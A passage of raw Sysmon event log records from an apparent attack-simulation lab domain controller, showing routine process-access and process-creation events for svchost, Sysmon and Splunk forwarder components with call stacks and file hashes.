EM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8557-5FCF-7500-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:27.859{10ACEC4A-8557-5FCF-7500-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8559-5FCF-7700-000000009101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8559-5FCF-7700-000000009101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.836{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8559-5FCF-7700-000000009101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.641{10ACEC4A-8559-5FCF-7700-000000009101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855A-5FCF-7800-000000009101}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DL